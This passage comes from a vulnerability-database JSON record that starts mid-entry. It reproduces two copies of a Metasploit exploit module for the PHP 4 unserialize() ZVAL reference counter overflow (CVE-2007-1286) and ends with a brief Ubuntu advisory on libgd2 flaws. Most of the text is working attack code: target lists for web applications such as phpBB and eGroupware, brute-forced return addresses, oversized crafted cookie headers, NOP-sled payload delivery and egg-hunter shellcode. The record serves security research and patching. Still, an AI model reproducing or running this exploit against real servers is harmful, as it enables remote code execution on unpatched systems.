'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' 
=> 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 WWWThreads',\n {\n 'DefaultCookie' => 'forum_cookie',\n 'DefaultURI' => '/index.php',\n 'Signature' => /Powered\\s+by.*WWWThreads/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 Deadman Redirect',\n {\n 'DefaultCookie' => 'authcookie',\n 'DefaultURI' => '/dmr/dmr.php',\n 'Signature' => /document\\.f\\.userdata\\.focus/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 PhpWebGallery',\n {\n 'DefaultCookie' => 'pwg_remember',\n 'DefaultURI' => '/phpwebgallery/index.php',\n 'Signature' => /Powered\\s+by.*phpwebgallery/msi,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 Ariadne-CMS',\n {\n 'DefaultCookie' => 'ARCookie',\n 'DefaultURI' => '/ariadne/loader.php/',\n 'Signature' => /Ariadne is free software/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 ProMA',\n {\n 'DefaultCookie' => 'proma',\n 'DefaultURI' => '/proma/index.php',\n 'Signature' => /Change Account Information/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 eGroupware',\n {\n 'DefaultCookie' => 'eGW_remember',\n 'DefaultURI' => '/egroupware/login.php',\n 'Signature' => /www.egroupware.org/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 
},\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ]\n ],\n 'DisclosureDate' => 'Mar 04 2007'))\n\n register_options(\n [\n OptString.new('URI', [false, \"The path to vulnerable PHP script\"]),\n OptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"])\n ])\n end\n\n\n def check\n vprint_status(\"Checking for a vulnerable PHP version...\")\n\n #\n # Pick the URI and Cookie name\n #\n cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\n uri_path = normalize_uri(datastore['URI']) || target['DefaultURI']\n\n if(not cookie_name)\n fail_with(Failure::Unknown, \"The COOKIENAME option must be set\")\n end\n\n if(not uri_path)\n fail_with(Failure::Unknown, \"The URI option must be set\")\n end\n\n res = send_request_cgi({\n 'uri'\t\t => uri_path,\n 'method'\t => 'GET'\n }, 5)\n\n php_bug = false\n\n if (not res)\n vprint_status(\"No response from the server\")\n return Exploit::CheckCode::Unknown # User should try again\n end\n\n http_fingerprint({ :response => res }) # check method\n\n if (res.code != 200)\n vprint_status(\"The server returned #{res.code} #{res.message}\")\n return Exploit::CheckCode::Safe\n end\n\n if (\n (res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or\n (res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/)\n )\n\n php_raw = $1\n php_ver = php_raw.split('.')\n\n if (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)\n vprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\")\n php_bug = true\n else\n vprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\")\n return Exploit::CheckCode::Safe\n end\n end\n\n # Detect the phpBB cookie name\n if res.get_cookies =~ /(.*)_(sid|data)=/\n vprint_status(\"The server may require a cookie name of '#{$1}_data'\")\n end\n\n if(target and target['Signature'])\n if (res.body and res.body.match(target['Signature']))\n vprint_status(\"Detected 
target #{target.name}\")\n else\n vprint_status(\"Did not detect target #{target.name}\")\n end\n\n end\n\n return php_bug ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected\n end\n\n\n def brute_exploit(target_addrs)\n\n zvalref = encode_semis('i:0;R:2;')\n\n#\n# Use this if we decide to do 'jmp edi' returns vs brute force\n#\n=begin\n # Linux specific egg-hunter\n tagger = \"\\x90\\x50\\x90\\x50\"\n hunter =\n \"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" +\n \"\\x3c\\xf2\\x74\\xf1\\xb8\" +\n tagger +\n \"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\"\n\n egghunter = \"\\xcc\" * 39\n egghunter[0, hunter.length] = hunter\n\n hashtable = \"\\xcc\" * 39\n hashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes\n\n hashtable[20, 4] = [target_addrs['Ret']].pack('V')\n hashtable[32, 4] = [target_addrs['Ret']].pack('V')\n=end\n\n #\n # Just brute-force addresses for now\n #\n tagger = ''\n egghunter = rand_text_alphanumeric(39)\n hashtable = rand_text_alphanumeric(39)\n hashtable[20, 4] = [target_addrs['Ret']].pack('V')\n hashtable[32, 4] = [target_addrs['Ret']].pack('V')\n\n\n #\n # Pick the URI and Cookie name\n #\n cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\n uri_path = normalize_uri(datastore['URI']) || target['DefaultURI']\n\n if(not cookie_name)\n fail_with(Failure::Unknown, \"The COOKIENAME option must be set\")\n end\n\n if(not uri_path)\n fail_with(Failure::Unknown, \"The URI option must be set\")\n end\n\n # Generate and reuse the original buffer to save CPU\n if (not @saved_cookies)\n\n # Building the malicious request\n print_status(\"Creating the request...\")\n\n # Create the first cookie header to get this started\n cookie_fun = \"Cookie: #{cookie_name}=\"\n cookie_fun << Rex::Text.uri_encode(\n 'a:100000:{s:8:\"' +\n rand_text_alphanumeric(8) +\n '\";a:3:{s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";a:1:{s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";i:0;}s:12:\"' +\n rand_text_alphanumeric(12) 
+\n '\";'+\n 'i:0;s:12:\"' +\n rand_text_alphanumeric(12) +\n '\";i:0;}'\n )\n cookie_fun << zvalref * 500\n cookie_fun << Rex::Text.uri_encode('s:2:\"')\n cookie_fun << \"\\r\\n\"\n\n refcnt = 1000\n refmax = 65535\n\n # Keep adding cookie headers...\n while(refcnt < refmax)\n\n chead = 'Cookie: ';\n chead << encode_semis('\";N;')\n\n # Stay within the 8192 byte limit\n 0.upto(679) do |i|\n break if refcnt >= refmax\n refcnt += 1\n\n chead << zvalref\n end\n chead << encode_semis('s:2:\"')\n cookie_fun << chead + \"\\r\\n\"\n end\n\n # The final header, including the hashtable with return address\n cookie_fun << \"Cookie: \"\n cookie_fun << Rex::Text.uri_encode('\";N;')\n cookie_fun << zvalref * 500\n\n @saved_cookies = cookie_fun\n end\n\n # Generate and reuse the payload to save CPU time\n if (not @saved_payload)\n @saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)\n end\n\n cookie_addrs = Rex::Text.uri_encode(\n 's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;'\n ) + \"\\r\\n\"\n\n print_status(\"Trying address 0x%.8x...\" % target_addrs['Ret'])\n res = send_request_cgi({\n 'uri'\t\t => uri_path,\n 'method'\t => 'POST',\n 'raw_headers' => @saved_cookies + cookie_addrs,\n 'data' => @saved_payload\n }, 1)\n\n\n if res\n failed = false\n\n print_status(\"Received a response: #{res.code} #{res.message}\")\n\n if (res.code != 200)\n print_error(\"The server returned a non-200 response, indicating that the exploit failed\")\n failed = true\n end\n\n if (not failed and (res.body and res.body.length > 0))\n print_error(\"The server returned a real response, indicating that the exploit failed\")\n failed = true\n end\n\n if (failed)\n print_status(\"Please verify the URI and COOKIENAME parameters.\")\n print_line('')\n print_line(\"*\" * 40)\n print_line(res.body)\n print_line(\"*\" * 40)\n print_line('')\n\n fail_with(Failure::Unknown, \"Exploit settings are probably wrong\")\n end\n else\n print_status(\"No response from the 
server\")\n end\n\n end\n\n def encode_semis(str)\n str.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) }\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/php/php_unserialize_zval_cookie.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:10", "bulletinFamily": "exploit", "description": "", "modified": "2009-10-27T00:00:00", "published": "2009-10-27T00:00:00", "href": "https://packetstormsecurity.com/files/82269/PHP-4-unserialize-ZVAL-Reference-Counter-Overflow.html", "id": "PACKETSTORM:82269", "type": "packetstorm", "title": "PHP 4 unserialize() ZVAL Reference Counter Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)', \n'Description' => %q{ \nThis module exploits an integer overflow vulnerability in the unserialize() \nfunction of the PHP web server extension. This vulnerability was patched by \nStefan in version 4.5.0 and applies all previous versions supporting this function. \nThis particular module targets numerous web applications and is based on the proof \nof concept provided by Stefan Esser. This vulnerability requires approximately 900k \nof data to trigger due the multiple Cookie headers requirement. 
Since we \nare already assuming a fast network connection, we use a 2Mb block of shellcode for \nthe brute force, allowing quick exploitation for those with fast networks. \n \nOne of the neat things about this vulnerability is that on x86 systems, the EDI register points \ninto the beginning of the hashtable string. This can be used with an egghunter to \nquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction \nis known. The EDI method is faster, but the bandwidth-intensive brute force used by this \nmodule is more reliable across a wider range of systems. \n \n \n}, \n'Author' => \n[ \n'hdm', # module development \n'GML <grandmasterlogic [at] gmail.com>', # module development and debugging \n'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-1286'], \n['OSVDB', '32771'], \n['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n}, \n'Targets' => \n[ \n \n# \n# 64-bit SuSE: 0x005c0000 \n# Backtrack 2.0: 0xb797a000 \n# Gentoo: 0xb6900000 \n# \n[ 'Linux x86 Generic', \n{ \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 phpBB2', \n{ \n'DefaultCookie' => 'phpbb2mysql_data', \n'DefaultURI' => '/phpBB2/faq.php', \n'Signature' => /Powered\\s+by.*phpBB/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 punBB', \n{ \n'DefaultCookie' => 'punbb_cookie', \n'DefaultURI' => '/index.php', \n'Signature' => /Powered\\s+by.*PunBB/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' 
=> { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 WWWThreads', \n{ \n'DefaultCookie' => 'forum_cookie', \n'DefaultURI' => '/index.php', \n'Signature' => /Powered\\s+by.*WWWThreads/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 Deadman Redirect', \n{ \n'DefaultCookie' => 'authcookie', \n'DefaultURI' => '/dmr/dmr.php', \n'Signature' => /document\\.f\\.userdata\\.focus/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 PhpWebGallery', \n{ \n'DefaultCookie' => 'pwg_remember', \n'DefaultURI' => '/phpwebgallery/index.php', \n'Signature' => /Powered\\s+by.*phpwebgallery/msi, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 Ariadne-CMS', \n{ \n'DefaultCookie' => 'ARCookie', \n'DefaultURI' => '/ariadne/loader.php/', \n'Signature' => /Ariadne is free software/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 ProMA', \n{ \n'DefaultCookie' => 'proma', \n'DefaultURI' => '/proma/index.php', \n'Signature' => /Change Account Information/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n], \n[ 'Linux x86 eGroupware', \n{ \n'DefaultCookie' => 'eGW_remember', \n'DefaultURI' => '/egroupware/login.php', \n'Signature' => /www.egroupware.org/, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ], \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 
0xb6000400 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 1024*1024 \n} \n} \n] \n], \n'DisclosureDate' => 'Mar 04 2007')) \n \nregister_options( \n[ \nOptString.new('URI', [false, \"The path to vulnerable PHP script\"]), \nOptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"]) \n], self.class) \nend \n \n \ndef check \nprint_status(\"Checking for a vulnerable PHP version...\") \n \n# \n# Pick the URI and Cookie name \n# \ncookie_name = datastore['COOKIENAME'] || target['DefaultCookie'] \nuri_path = datastore['URI'] || target['DefaultURI'] \n \nif(not cookie_name) \nraise RuntimeError, \"The COOKIENAME option must be set\" \nend \n \nif(not uri_path) \nraise RuntimeError, \"The URI option must be set\" \nend \n \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'GET' \n}, 5) \n \nphp_bug = false \n \nif (not res) \nprint_status(\"No response from the server\") \nreturn Exploit::CheckCode::Safe \nend \n \nif (res.code != 200) \nprint_status(\"The server returned #{res.code} #{res.message}\") \nreturn Exploit::CheckCode::Safe \nend \n \nif ( \n(res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or \n(res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/) \n) \n \nphp_raw = $1 \nphp_ver = php_raw.split('.') \n \nif (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5) \nprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\") \nphp_bug = true \nelse \nprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\") \nreturn Exploit::CheckCode::Safe \nend \nend \n \n# Detect the phpBB cookie name \nif (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) \nprint_status(\"The server may require a cookie name of '#{$1}_data'\") \nend \n \nif(target and target['Signature']) \nif (res.body and res.body.match(target['Signature'])) \nprint_status(\"Detected target #{target.name}\") \nelse \nprint_status(\"Did 
not detect target #{target.name}\") \nend \n \nend \n \nreturn php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears \nend \n \n \ndef brute_exploit(target_addrs) \n \nzvalref = encode_semis('i:0;R:2;') \n \n# \n# Use this if we decide to do 'jmp edi' returns vs brute force \n# \n=begin \n# Linux specific egg-hunter \ntagger = \"\\x90\\x50\\x90\\x50\" \nhunter = \n\"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" + \n\"\\x3c\\xf2\\x74\\xf1\\xb8\" + \ntagger + \n\"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\" \n \negghunter = \"\\xcc\" * 39 \negghunter[0, hunter.length] = hunter \n \nhashtable = \"\\xcc\" * 39 \nhashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes \n \nhashtable[20, 4] = [target_addrs['Ret']].pack('V') \nhashtable[32, 4] = [target_addrs['Ret']].pack('V') \n=end \n \n# \n# Just brute-force addresses for now \n# \ntagger = '' \negghunter = rand_text_alphanumeric(39) \nhashtable = rand_text_alphanumeric(39) \nhashtable[20, 4] = [target_addrs['Ret']].pack('V') \nhashtable[32, 4] = [target_addrs['Ret']].pack('V') \n \n \n# \n# Pick the URI and Cookie name \n# \ncookie_name = datastore['COOKIENAME'] || target['DefaultCookie'] \nuri_path = datastore['URI'] || target['DefaultURI'] \n \nif(not cookie_name) \nraise RuntimeError, \"The COOKIENAME option must be set\" \nend \n \nif(not uri_path) \nraise RuntimeError, \"The URI option must be set\" \nend \n \n# Generate and reuse the original buffer to save CPU \nif (not @saved_cookies) \n \n# Building the malicious request \nprint_status(\"Creating the request...\") \n \n# Create the first cookie header to get this started \ncookie_fun = \"Cookie: #{cookie_name}=\" \ncookie_fun << Rex::Text.uri_encode( \n'a:100000:{s:8:\"' + \nrand_text_alphanumeric(8) + \n'\";a:3:{s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";a:1:{s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";i:0;}s:12:\"' + \nrand_text_alphanumeric(12) + \n'\";'+ \n'i:0;s:12:\"' + \nrand_text_alphanumeric(12) + 
\n'\";i:0;}' \n) \ncookie_fun << zvalref * 500 \ncookie_fun << Rex::Text.uri_encode('s:2:\"') \ncookie_fun << \"\\r\\n\" \n \nrefcnt = 1000 \nrefmax = 65535 \n \n# Keep adding cookie headers... \nwhile(refcnt < refmax) \n \nchead = 'Cookie: '; \nchead << encode_semis('\";N;') \n \n# Stay within the 8192 byte limit \n0.upto(679) do |i| \nbreak if refcnt >= refmax \nrefcnt += 1 \n \nchead << zvalref \nend \nchead << encode_semis('s:2:\"') \ncookie_fun << chead + \"\\r\\n\" \nend \n \n# The final header, including the hashtable with return address \ncookie_fun << \"Cookie: \" \ncookie_fun << Rex::Text.uri_encode('\";N;') \ncookie_fun << zvalref * 500 \n \n@saved_cookies = cookie_fun \nend \n \n# Generate and reuse the payload to save CPU time \nif (not @saved_payload) \n@saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256) \nend \n \ncookie_addrs = Rex::Text.uri_encode( \n's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;' \n) + \"\\r\\n\" \n \nprint_status(\"Trying address 0x%.8x...\" % target_addrs['Ret']) \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'POST', \n'raw_headers' => @saved_cookies + cookie_addrs, \n'data' => @saved_payload \n}, 1) \n \n \nif res \nfailed = false \n \nprint_status(\"Received a response: #{res.code} #{res.message}\") \n \nif (res.code != 200) \nprint_status(\"The server returned a non-200 response, indicating that the exploit failed.\") \nfailed = true \nend \n \nif (not failed and (res.body and res.body.length > 0)) \nprint_status(\"The server returned a real response, indicating that the exploit failed.\") \nfailed = true \nend \n \nif (failed) \nprint_status(\"Please verify the URI and COOKIENAME parameters.\") \nprint_line('') \nprint_line(\"*\" * 40) \nprint_line(res.body) \nprint_line(\"*\" * 40) \nprint_line('') \n \nraise RuntimeError, \"Exploit settings are probably wrong\" \nend \nelse \nprint_status(\"No response from the server\") \nend \n \nend \n \ndef encode_semis(str) 
\nstr.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) } \nend \n \nend \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82269/php_unserialize_zval_cookie.rb.txt"}], "ubuntu": [{"lastseen": "2019-01-29T20:33:08", "bulletinFamily": "unix", "description": "A buffer overflow was discovered in libgd2\u2019s font renderer. By tricking an application using libgd2 into rendering a specially crafted string with a JIS encoded font, a remote attacker could read heap memory or crash the application, leading to a denial of service. (CVE-2007-0455)\n\nXavier Roche discovered that libgd2 did not correctly validate PNG callback results. If an application were tricked into processing a specially crafted PNG image, it would monopolize CPU resources. Since libgd2 is often used in PHP and Perl web applications, this could lead to a remote denial of service. (CVE-2007-2756)", "modified": "2007-06-12T00:00:00", "published": "2007-06-12T00:00:00", "id": "USN-473-1", "href": "https://usn.ubuntu.com/473-1/", "title": "libgd2 vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}